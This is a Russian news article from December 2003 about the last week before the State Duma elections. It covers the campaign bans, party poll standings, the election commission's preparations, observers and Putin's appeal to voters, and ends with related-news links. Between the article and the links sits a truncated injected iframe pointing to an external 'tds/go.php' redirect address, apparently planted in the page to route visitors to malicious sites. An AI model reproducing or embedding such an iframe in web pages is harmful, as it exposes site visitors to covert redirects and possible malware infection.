02.12.2003, 09:45

Финишная прямая выборов

Парламентская избирательная кампания выходит на финишную прямую – ровно через неделю уже станут известны предварительные результаты выборов депутатов Госдумы.


Последняя неделя избирательной кампании, с одной стороны, обещает стать более спокойной, чем предыдущие – ведь в последние пять дней перед выборами закон запрещает, даже в судебном порядке, снимать с регистрации отдельных кандидатов и целые партийные списки. Не допускается в последние пять дней и публикация результатов социологических опросов, предвыборных рейтингов партий и блоков.


А в субботу, 6 декабря, вступит запрет и на ведение любой предвыборной агитации - этот день дается избирателям, чтобы они могли в спокойной обстановке осмыслить все услышанное от партий и кандидатов и сделать свой выбор.


С другой стороны, агитационная кампания, как показывает российский опыт, именно в последние дни перед выборами приобретает особый накал. Все 23 избирательных объединения, ведущие борьбу за депутатские мандаты, попытаются склонить на свою сторону колеблющихся избирателей, число которых, по данным социологов, достигает 25%.

Пока же, как показывают социологические опросы, в предвыборной гонке лидирует «Единая Россия», опережающая на несколько пунктов КПРФ. Хорошие шансы попасть в Госдуму имеют также либерал-демократы Жириновского. В последние недели стал расти рейтинг блока «Родина». Что касается СПС и «Яблока», то они балансируют у «опасной черты» – их популярность у избирателей, согласно опросам, колеблется вокруг отметки в 5 процентов.


Завершают подготовку к дню голосования избирательные комиссии всех уровней. Как заявил на днях глава ЦИК Александр Вешняков, сейчас центр тяжести подготовки переместился в участковые избирательные комиссии. Во вторник, 2 декабря, на Всероссийском селекторном совещании, в котором примут участие свыше 100 тысяч человек, в том числе руководители 94 тысяч участковых избиркомов, будет проверена степень готовности избирательной системы страны к парламентским выборам.


Председатель Центризбиркома Александр Вешняков твердо заверяет избирателей, что «грузинского варианта» на выборах в России не будет. ЦИК обещал всяческую поддержку партиям и блокам в организации «тотального наблюдения» за ходом голосования и подсчета голосов.


Более того, глава ЦИК прямо призвал партии организовать параллельный подсчет голосов, чтобы они могли убедиться в действенности и беспристрастности Государственной автоматизированной системы «Выборы».


Готовятся к российским парламентским выборам и международные наблюдатели, которых ожидается около тысячи человек. Почти 700 из них уже получили аккредитацию Центризбиркома. Наблюдатели будут следить за соблюдением законности при проведении голосования не только в Москве, но и в целом ряде регионов, в том числе в Чеченской республике.


Президент Путин в прошедшую пятницу призвал избирателей к активному участию в голосовании 7 декабря. Он назвал парламентские выборы «самым важным внутриполитическим событием текущего года» и выразил надежду на то, что день выборов в парламент страны пройдет при высокой политической активности граждан. «От голосования россиян будет зависеть будущее развитие России», – подчеркнул глава государства.


Владимир Путин напомнил о своем появлении на предвыборном съезде «Единой России» в сентябре этого года, вызвавшем многочисленные протесты левой оппозиции. Он заявил, что имел право прийти на форум единороссов, чтобы «поблагодарить их за совместную работу». «Единая Россия» – та политическая сила, на которую я в течение всех четырех лет опирался, и которая меня последовательно поддерживала», – сказал президент.

<iframe src="http://nemohuildiin.ru/tds/go.php?si

Похожие новости по теме
09.12.2003, 09:40

Выборы были честными

Выборы депутатов Госдумы были честными. Такое мнение высказал в понедельник на итоговой пресс-конференции в Москве глава Центризбиркома РФ Александр Вешняков. «Сегодня я не слышал высказываний,...

02.12.2003, 09:54

Вступил в силу запрет на публикацию рейтингов и прогнозов

С сегодняшнего дня по нормам Избирательного законодательства РФ в СМИ запрещена публикация результатов социологических опросов, предвыборных рейтингов партий и блоков и прогнозов результатов...

27.12.2002, 10:12

Вешняков подвел итоги года

Председатель Центризбиркома России Александр Вешняков положительно оценивает итоги состоявшихся в уходящем году выборов в субъектах Федерации. Как передает корреспондент РИА «Новости», Вешняков...

22.10.2002, 09:20

Илюмжинов победил и проиграл

Второй тур выборов президента Калмыкии может состояться 27 октября или 3 ноября. Об этом, как передает корреспондент РИА «Новости», в понедельник заявил журналистам председатель Центизбиркома России...

14.10.2002, 09:30

Вешняков обвиняет Илюмжинова

Со стороны действующего Президента Калмыкии в период предвыборной кампании в республике наблюдается «злоупотребление использованием своего служебного положения», заявил глава ЦИК РФ Александр...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам